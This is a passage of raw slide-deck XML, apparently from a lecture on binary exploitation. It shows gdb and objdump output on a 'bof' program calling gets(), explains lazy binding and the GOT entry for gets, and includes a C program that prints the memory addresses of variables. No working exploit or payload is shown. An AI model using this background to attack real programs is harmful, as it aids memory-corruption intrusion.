            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x61ffd6ac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0028| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5ec</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x4c0c3a00 ('')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[------------------------------------------------------------------------------]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Legend: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:t>, value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0x08048493 in main ()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x/wx 0x804a00c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0x804a00c:      0xf7e6f3e0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x/i 0xf7e6f3e0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0xf7e6f3e0 &lt;_IO_gets&gt;:       push   ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1339" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="743682" y="10219055"/>
            <a:ext cx="9620206" cy="2955291"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9620204" cy="2955289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1335" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="120650"/>
              <a:ext cx="8973553" cy="283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rPr>
                  <a:solidFill>
                    <a:srgbClr val="C7B939"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="45C897"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Ubuntu</a:t>
              </a:r>
              <a:r>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="F7509D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tmp</a:t>
              </a:r>
              <a:r>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="4EC5DA"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>➤ </a:t>
              </a:r>
              <a:r>
                <a:t>objdump -S ./bof|more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./bof:     file format elf32-i386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        ...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08048330 &lt;gets@plt&gt;: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 8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FF2600"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0x804a00c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 8048336:       68 00 00 00 00          push   $0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1338" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6746968" y="-1"/>
              <a:ext cx="2873237" cy="2151662"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2873236" cy="2151660"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1336" name="Line"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="1233318" y="822679"/>
                <a:ext cx="1" cy="1328982"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1016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37" name="gets的GOT表"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="2873237" cy="726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gets的GOT表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9" dur="1000" fill="hold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3" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1333" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1339" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1334" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="133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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="56482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0" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="11880313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 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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2" name="Screen Shot 2019-04-11 at 11.05.01 PM.png" descr="Screen Shot 2019-04-11 at 11.05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046" y="2606147"/>
            <a:ext cx="14624318" cy="8503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9-04-11 at 11.03.28 PM.png" descr="Screen Shot 2019-04-11 at 11.03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29000" y="7971764"/>
            <a:ext cx="5519448" cy="296744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Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365552" y="6037465"/>
            <a:ext cx="10973201" cy="436845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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2600"/>
                </a:solidFill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365552" y="10696815"/>
            <a:ext cx="11081913" cy="436845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="0433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2600"/>
                </a:solidFill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16123307" y="9477586"/>
            <a:ext cx="4196211" cy="436845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="508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2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16128138" y="9975656"/>
            <a:ext cx="4196211" cy="436845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="0433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2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="#include &lt;stdio.h&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15489964" y="1747984"/>
            <a:ext cx="6797521" cy="580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6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8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;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CCCCCC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sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F08D4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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>1234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CCCCCC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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC99CD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const</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PI</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.14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F08D4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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){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CCCCCC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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:t> c</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>456</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F08D4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CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char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67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"a addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"b addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"c addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c);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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"d addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,d);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7EC699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rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>"PI addr = %x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="67CDCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PI);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CC99CD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CCCC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F08D49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 defTabSz="457200">
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC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59" name="Stack &amp; Heap is buffer!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036514" y="6285229"/>
            <a:ext cx="10298272" cy="1145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800">
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Stack &amp; Heap is buffer!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Lazy binding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5715110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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1342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343" name="root@Ubuntu : tmp ➤ gdb ./bof…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567259" y="4716779"/>
            <a:ext cx="11236783" cy="679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gdb ./bof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disas main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Dump of assembler code for function main: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0x0804846b &lt;+0&gt;:     lea    ecx,[esp+0x4]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0x0804846f &lt;+4&gt;:     and    esp,0xfffffff0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            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            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            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0x0804848e</a:t>
            </a:r>
            <a:r>
              <a:t> &lt;+35&gt;:    call   0x8048330 &lt;gets@plt&gt;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            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            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            .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0x080484b3 &lt;+72&gt;:    ret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End of assembler dump.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b*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0804848e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700" fill="hold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3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Lazy binding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="5715110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Lazy binding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1346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347" name="[gdb]&gt; r…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10536608" y="576580"/>
            <a:ext cx="12490733" cy="128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FC126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[gdb]&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5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[----------------------------------registers-----------------------------------]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EAX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0xc3a00ff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EBX</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x0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ECX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd610</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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EDX</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd634</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0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ESI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EDI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0xf7fc2000</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x1b1db0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EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5f8</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x0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ESP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0xffffd5d0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0xc3a00ff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EIP</a:t>
            </a:r>
            <a:r>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804848e</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;main+35&gt;:      call   0x8048330 &lt;gets@plt&gt;)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EFLAGS</a:t>
            </a:r>
            <a:r>
              <a:t>: 0x296 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>carry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PARITY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ADJUST</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zero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SIGN</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trap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INTERRUPT</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direction</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:t>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[-------------------------------------code-------------------------------------]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0x8048487 &lt;main+28&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub    esp,0xc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0x804848a &lt;main+31&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lea    eax,[ebp-0xd]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0x804848d &lt;main+34&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5F5F5F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   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45C897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 b="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt; 0x804848e &lt;main+35&gt;: </a:t>
            </a:r>
            <a:r>
              <a:t>call   0x8048330 &lt;gets@plt&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0"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0x8048493 &lt;main+40&gt;: add    esp,0x10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0x8048496 &lt;main+43&gt;: mov    eax,0x0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0x804849b &lt;main+48&gt;: mov    edx,DWORD PTR [ebp-0xc]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0x804849e &lt;main+51&gt;: xor    edx,DWORD PTR gs:0x14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Guessed arguments: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arg[0]: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0xc3a00ff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arg[1]: 0x1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arg[2]: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:  add    ebx,0x1835b0)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arg[3]: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:        add    edi,0x1)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[------------------------------------stack-------------------------------------]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0000| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d0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0xc3a00ff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0004| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5d4</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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0008| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5d8</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xf7e3ea50</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__new_exitfn+16&gt;:     add    ebx,0x1835b0)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0012| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5dc</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x804850b</a:t>
            </a:r>
            <a:r>
              <a:t> (&lt;__libc_csu_init+75&gt;:   add    edi,0x1)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0016| </a:t>
            </a:r>
            <a:r>
              <a:t>0xffffd5e0</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --&gt; 0x1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0020| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e4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0xffffd6a4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0xffffd7d0</a:t>
            </a:r>
            <a:r>
              <a:t> ("/tmp/bof")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0024| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5e8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0xffffd6ac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0xffffd7d9</a:t>
            </a:r>
            <a:r>
              <a:t> ("XDG_SESSION_ID=288")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0028| </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd5ec</a:t>
            </a:r>
            <a:r>
              <a:t> --&gt; 0x4c0c3a00 ('')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[------------------------------------------------------------------------------]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Legend: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7509D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="4AB2EB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="45C897"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:t>, value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Breakpoint 1, 0x0804848e in main ()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x/wx 0x804a00c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0x804a00c:      0x08048336</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1352" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="743682" y="10219055"/>
            <a:ext cx="9620206" cy="2955291"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9620204" cy="2955289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1348" name="root@Ubuntu : tmp ➤ objdump -S ./bof|more…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="120650"/>
              <a:ext cx="8973553" cy="283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rPr>
                  <a:solidFill>
                    <a:srgbClr val="C7B939"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="45C897"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Ubuntu</a:t>
              </a:r>
              <a:r>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="F7509D"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tmp</a:t>
              </a:r>
              <a:r>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="4EC5DA"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>➤ </a:t>
              </a:r>
              <a:r>
                <a:t>objdump -S ./bof|more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./bof:     file format elf32-i386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        ...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08048330 &lt;gets@plt&gt;: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 8048330:       ff 25 0c a0 04 08       jmp    *</a:t>
              </a:r>
              <a:r>
                <a:rPr>
                  <a:solidFill>
                    <a:srgbClr val="FF2600"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0x804a00c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 8048336:       68 00 00 00 00          push   $0x0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
